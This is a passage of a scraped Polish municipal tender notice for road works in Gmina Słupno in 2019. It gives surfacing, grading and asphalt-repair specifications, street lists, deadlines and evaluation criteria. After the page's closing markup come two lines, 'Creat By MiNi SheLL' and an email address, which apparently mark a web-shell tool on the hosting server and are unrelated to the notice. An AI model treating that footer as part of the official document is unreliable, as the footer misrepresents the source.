ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Część 1 - Utwardzenie nawierzchni dróg gruzem betonowym</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>	Zakres prac obejmuje - Tyczenie geodezyjne osi drogi - Mechaniczne wykonanie koryta dla średniej głębokości 25cm (jeżeli będzie zachodziła konieczność),- Ułożenia warstwy piasku o grubości co najmniej 25 cm po zagęszczeniu (jeżeli będzie zachodziła konieczność),- Transport materiału z wykopu na odległość do 5km,- Zagęszczenie oraz profilowanie koryta,- Ułożenie warstwy gruzu betonowego - grubości 15cm po zagęszczeniu,- Mechaniczne zagęszczenie ułożonej warstwy kruszywa,- Regulacja wysokościowa studni i zasuw.Wymagania sprzętowe- Koparka lub koparko ładowarka z łyżką umożliwiającą wykonanie koryta,- Samochód lub samochody samowyładowcze,- Walec stalowy lub gumowo stalowy, - Zagęszczarka typ ciężki. Wymagania materiałowePiasek lub pospółka o różnoziarnistości co najmniej 3. Gruz betonowy frakcji 0/63 posiadające dokument potwierdzający dopuszczenie do stosowania w budownictwie Opis robótZakres robót obejmuje tyczenie osi drogi przez uprawnionego geodetę. Nie wymagana jest inwentaryzacja geodezyjna oraz wykonanie map inwentaryzacyjnych. Mechaniczne wykonanie koryta na średnią głębokość 25cm wraz z odwiezieniem urobku do 5km. Zamawiający zastrzega sobie prawo do dysponowania całością lub częścią urobku z wykopu i wskazania miejsca jego składowania. Część nie zadysponowaną przez Zamawiającego ma obowiązek zadysponować wykonawca bez prawa do dodatkowego wynagrodzenia. Ręczne profilowanie dna koryta oraz zagęszczenie przy pomocy zagęszczarek lub walca. Zamawiający ma prawo do wskazania miejsc, w których ma być wykonany pomiar stopnia zagęszczenia oraz wykonane dogęszczenie dna koryta. Ułożenie dolnej warstwy piasku o grubości co najmniej 25cm po zagęszczeniu. Warstwa górna o grubości co najmniej 15 cm, powinna być wykonane z gruzu betonowego frakcji 0/63 dopuszczonego do stosowania w budownictwie.Każda z warstw powinna być oddzielnie wyprofilowana oraz zagęszczona.Warstwy można układać mechanicznie, przy pomocy rozkładarki do kruszywa, koparek, ładowarek lub ręczne. Ułożona warstwa powinna być odpowiednio wyprofilowana oraz jednorodna.Zagęszczenie warstw należy wykonać przy pomocy walca lub zagęszczarki typu ciężkiego. Inwestor ma prawo do wskazania miejsc, w których ma być wykonany pomiar stopnia zagęszczenia ułożonych warstw oraz wykonane dogęszczenie.Uporządkowanie terenu budowy.Wykonawca powinien dysponować sprzętem o parametrach oraz gruzem betonowym w ilości aby mógł zrealizować min. 300m2 drogi dziennie w technologii przewidzianej dla powyższego zakresu.Zakres robótZakres robót obejmuje utwardzenie nawierzchni drogi gruzem betonowym w okresie od daty podpisania umowy do 15.09.2019r. Zamawiający przewiduje następujące ulice na terenie gminy do utwardzenia gruzem betonowym:Cekanowo - 1 000m2:o	ul. Rumiankowa - sięgacz (z korytowaniem) - 50m długości i 4m szerokości,o	ul. Stokrotki(z korytowaniem) - 200m długości i 4m szerokości.Stare Gulczewo - 640m2:o	droga na działce nr 28/1 (z korytowaniem) - 160m długości i 4m szerokości.Słupno - 5 090m2:o	ulica Calineczki (bez korytowania) - 660m długości i 4 m szerokości,o	droga nr 291212W (bez korytowania) - 550m długości i 3 m szerokości,o	ulica Młynarska (bez korytowania) - 200m długości i 4m szerokości.W sumie jest do wykonania 1 640m2 nawierzchni drogi z gruzu betonowego z korytowaniem i warstwą piasku oraz 5 090m2 nawierzchni drogi tylko z samego gruzu betonowego.Rozliczenie robótRozliczenie robót nastąpi po dokonaniu obmiaru wykonanych robót w m2 potwierdzonych przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45000000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-09-15<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>CZĘŚĆ 2 - Wykonanie nawierzchni dróg z kruszywa bitumiczno - kamiennego (destrukt)</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>	Zakres prac obejmuje- Tyczenie geodezyjne osi drogi - Mechaniczne profilowanie istniejącej korony drogi- Zagęszczenie istniejącej korony drogi- Regulacja wysokościowa studni i zasuw- Ułożenie warstwy kruszywa bitumiczno-kamiennego - grubości co najmniej 9cm po zagęszczeniu- Mechaniczne zagęszczenie ułożonej warstwy kruszywa bitumiczno-kamiennego (walec, zagęszczarka).Wymagania sprzętowe- Rozściełacz lub koparka/koparko ładowarka z łyżką umożliwiającą wykonanie koryta- Samochód lub samochody samowyładowcze- Walec stalowy lub gumowo stalowy - Zagęszczarka typ ciężki Wymagania materiałoweKruszywo bitumiczno-kamienne pochodzące z frezowania istniejących nawierzchni bitumicznych nie powinno zawierać domieszek betonu, oraz innych materiałów. Wielkość ziaren kruszywa powinna gwarantować odpowiednie zagęszczenie ułożonej warstwy, średnica nie powinna być większa niż 25mm.Wykonawca przed rozpoczęciem układania zobowiązany jest do uzyskania akceptacji kruszywa z którego wykonywany będzie zlecony zakres drogi u inspektora nadzoru.Wykonawca powinien dysponować sprzętem o parametrach, oraz kruszywem ilości aby mógł zrealizować min. 300m2 drogi dziennie w technologii przewidzianej dla powyższego zakresu.Czas na realizację - do 15 września 2019r.Opis robótZakres robót obejmuje tyczenie osi drogi przez uprawnionego geodetę. Nie wymagana jest inwentaryzacja geodezyjna oraz wykonanie map inwentaryzacyjnych. Mechaniczne profilowanie istniejącej korony drogi przy pomocy równiarki, koparko-ładowarki lub koparki oraz zagęszczenie przy pomocy walca lub zagęszczarki typ ciężki. Wykonanie niezbędnych robót przygotowawczych - regulacja wysokościowa studni i zasuw. Ułożenie warstwy kruszywa bitumiczno-kamiennego - grubości co najmniej 9cm po zagęszczeniu i szerokości 4m. Dodatkowo należy wykonać 1,5m zjazdy do każdej posesji i każdej krzyżującej się drogi.Kruszywo bitumiczno-kamienne pochodzące z frezowania istniejących nawierzchni bitumicznych nie powinno zawierać domieszek betonu, oraz innych materiałów. Wielkość ziaren kruszywa powinna gwarantować odpowiednie zagęszczenie ułożonej warstwy, średnica nie powinna być większa niż 25mm.Każda partia materiału musi być dopuszczona do wbudowania przez inspektora nadzoru lub upoważnionego pracownika Urzędu Gminy. Kruszywo można układać mechanicznie, przy pomocy rozściełacza, koparek, ładowarek lub ręcznie. Ułożona warstwa powinna być odpowiednio wyprofilowana oraz jednorodna.Zagęszczenie warstw należy wykonać przy pomocy walca lub zagęszczarki typ ciężki. Wykonawca powinien dysponować sprzętem o parametrach, oraz kruszywem w ilości aby mógł zrealizować min. 300m2 drogi dziennie w technologii przewidzianej dla powyższego zakresuZakres robótZakres robót obejmuje utrzymanie dróg w okresie od daty podpisania umowy do 15.09.2019r. Zamawiający przewiduje następujące ulice na terenie gminy do utwardzenia kruszywem bitumiczno-kamiennym:Nowe Gulczewo - 1145mb:o	ul. Podbipęnty - 570m długości i 4m szerokości,o	ul. Sarmacka - 290m długości i 4m szerokości,o	ul. Husarska - 130m długości i 4m szerokości,o	ul. Przesmyk - 95m długości i 4m szerokości,o	ul. Szlachecka - 60m długości i 4m szerokości.Słupno - 785mb:o	ul. Do Grodziska - 125m długości i 4m szerokości,o	ul. Cedrowa - 300m długości i 4m szerokości,o	ul. Wiosenna - 50m długości i 4m szerokościo	ul. Młynarska - 310m długości i 5m szerokości.Cekanowo - 250mb:o	ul. Rumiankowa - 250m długości i 4m szerokości.Wykowo - 300mb:o	Uliczki - 300m długości i 4m szerokości.Liszyno - 330mb:o	Pogodna - 260m długości i 4m szerokości,o	Migdałowa - 70m długości i 4m szerokości.Borowiczki Pieńki - 390mb:o	Liściasta - 140m długości i 4m szerokości,o	Kupiecka - 80m długości i 4m szerokości,o	Boczna - 170m długości i 4m szerokości.Co stanowi 13 110m2, do tego doliczane jest 10% na wykonanie dojazdów z remontowanych ulic do posesjami znajdującymi się przy niej.W sumie jest do wykonania 14 421m2 nawierzchni drogi z kruszywa bitumiczno-kamiennego (destrukt)Rozliczenie robótRozliczenie nastąpi po wykonaniu robót i odbiorze potwierdzonym przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45000000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-09-15<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>CZĘŚĆ 3 - Wyrównanie dróg gruntowych oraz częściowo utwardzonych równiarką wraz z zagęszczeniem walcem</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac obejmuje- wyrównanie istniejącej nawierzchni drogi gruntowej lub częściowo utwardzonej przy pomocy równiarki,- zagęszczenie walcem.Wymagania sprzętowe- równiarka - walecWymagania materiałoweBRAKCzas na realizację- do 30.06.2019r.Opis robótRoboty obejmują wyrównanie istniejącej nawierzchni drogi gruntowej lub częściowo utwardzonej przy pomocy równiarki z nadaniem spadku poprzecznego i podłużnego oraz zagęszczenie przy pomocy walca. Należy zwrócić szczególną uwagę na studnie kanalizacji sanitarnej jak również zasuwy znajdujące się w drodze.Zakres robótZakres robót obejmuje utrzymanie dróg w okresie od daty podpisania umowy do 30.06.2019r. Zamawiający przewiduje następujące ulice i drogi na terenie gminy do wyrównania:Liszyno - 1 080m2:o	Pogodna - 270m długości i 4 m szerokości,Stare Gulczewo/Mirosław - 7 700m2:o	,,Trakt" - 2200m długości i 3,5 m szerokości,Słupno - 3 255m2:o	Wiosenna - 930m długości i 3,5 m szerokości,Barcikowo - 2 100m2:o	Droga na działce nr 79 - 600m długości i 3,5 m szerokości,Wykowo - 10 380m2:o	Droga na działce nr 39/1 - 950m długości i 3 m szerokości,2850o	Droga na działce nr 103/2 - 950m długości i 3,5 m szerokości,3325o	Droga na działce nr 103/2 - 950m długości i 3,5 m szerokości,3325o	Droga ,,do wału" - 220m długości i 4 m szerokości,880Mirosław - 1 750m2:o	Droga na granicy - 500m długości i 3,5 m szerokości,Co stanowi 24 375 m2 dróg i ulic przeznaczonych do utwardzenia na terenie Gminy Słupno. Rozliczenie robótRozliczenie robót nastąpi po dokonaniu obmiaru wykonanych robót w m2 potwierdzonych przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45000000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>CZĘŚĆ 4 - Naprawa ubytków w nawierzchni bitumicznej</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac obejmuje- cięcie piłą nawierzchni bitumicznej na średnią głębokość 6 cm- uzupełnienie istniejącej podbudowy średnio grubości 10cm,- skropienie podbudowy emulsją asfaltową,- ułożenie warstwy asfaltu na średnią grubości 4cm,- zagęszczenie,- uszczelnienie połączenia emulsją asfaltową oraz grysem. Wymagania sprzętowe- Samochód dostawczy lub ciężarowy,- Urządzenie do przerobu zerwanego asfaltu,- Walec, - Zagęszczarka,- Piła do ciecia asfaltu.Wymagania materiałowe- Masa bitumiczna z odzysku umożliwiająca przerobienie jej oraz wbudowanie,- Emulsja asfaltowa,- Grys bazaltowy frakcji 2/5,- Kruszywo kamienne(mieszanka optymalna) frakcji 0/31,5.Zamawiający dopuszcza stosowanie mieszanki mineralno-asfaltowej produkowanej w otaczarce i dowożonej samochodem samowyładowczym na miejsce wbudowania. Parametry mieszanki produkowanej w otaczarce powinny być dostosowane dla kategorii ruchu KR3. Wykonawca na żądanie Zamawiającego przedłoży dla danej partii potwierdzone za zgodność z oryginałem recepty, atesty na materiały oraz wyniki badań mieszanki mineralno-asfaltowej produkowanej w otaczarceWykonawca po rozgrzaniu a przed rozpoczęciem układania mieszanki mineralno-asfaltowej wytwarzanej w urządzeniu do przerobu zerwanego asfaltu zobowiązany jest do uzyskania jej akceptacji u inspektora nadzoru.Wykonawca powinien dysponować sprzętem o parametrach, oraz mieszanką mineralno-asfaltową w ilości aby mógł wytworzyć i wbudować min. 3 tony mieszanki mineralno-asfaltowej dziennie przewidzianej dla powyższego zakresu.Opis robótRoboty obejmują cięcie piłą mechaniczną nawierzchni asfaltowej na średnią głębokość 6cm. Wykonanie koryta pod warstwy konstrukcyjne, uzupełnienie przy pomocy kruszywa kamiennego (mieszanka optymalna) frakcji 0/31,5 z kamienia dolomitowego, polnego, gabro lub innych posiadających dokument dopuszczający do stosowania w budownictwie oraz zagęszczenie przy pomocy zagęszczarki płytowej lub stopy wibracyjnej. Zamawiający nie dopuszcza stosowania kruszywa z kamienia wapiennego. Skropienie warstwy podbudowy oraz krawędzi emulsją asfaltową.Ułożenie warstwy asfaltu o średniej grubości 4cm po zagęszczeniu oraz zagęszczenie walcem. Warstwa ścieralna powinna nawiązywać wysokościowo do istniejącej nawierzchni bitumicznej. Powinna być odpowiednio wyprofilowana oraz posiadać spadki umożliwiające spływ powierzchniowy wód opadowych.Uszczelnienie połączenia przy pomocy emulsji asfaltowej oraz grysu bazaltowego.Zakres robótZakres robót obejmuje utrzymanie dróg w okresie od daty podpisania umowy do 30.06.2019r. Zamawiający przewiduje następujące ulice na terenie gminy do naprawy ubytków w nawierzchni bitumicznej: Szeligi - 1 800m2:o	Droga nr 291209W - ca 1800m2.Sambórz - 2 700m2o	Droga nr 291207W - ca 2700m2.Co stanowi 4 500 m2 dróg i ulic przeznaczonych do naprawy ubytków w nawierzchni bitumicznej na terenie Gminy Słupno.Rozliczenie robótRozliczenie robót nastąpi po dokonaniu obmiaru wykonanych robót w m2 potwierdzonych przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45000000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com